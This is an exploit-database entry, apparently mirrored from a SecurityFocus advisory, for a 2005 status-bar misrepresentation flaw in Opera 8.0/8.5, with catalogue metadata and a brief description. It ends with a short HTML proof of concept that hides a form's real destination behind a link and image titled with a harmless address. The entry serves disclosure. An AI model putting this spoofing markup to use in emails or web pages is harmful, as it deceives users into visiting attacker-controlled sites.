Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation
Author: Sverx
type: remote
platform: multiple
port:
date_added: 2005-11-16
date_updated: 2013-07-02
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/15472/info
A vulnerability has been identified in Opera Web browser that allows an attacker to misrepresent the status bar in the browser, allowing vulnerable users to be mislead into following a link to a malicious site.
This vulnerability would most likely be exploited through HTML e-mail, though other attack vectors exist such as HTML injection attacks in third-party Web applications.
<form action="[malicious site]">
<a href="www.example.com"><input type="image" src="[image]" title="www.example.com"></a>
</form>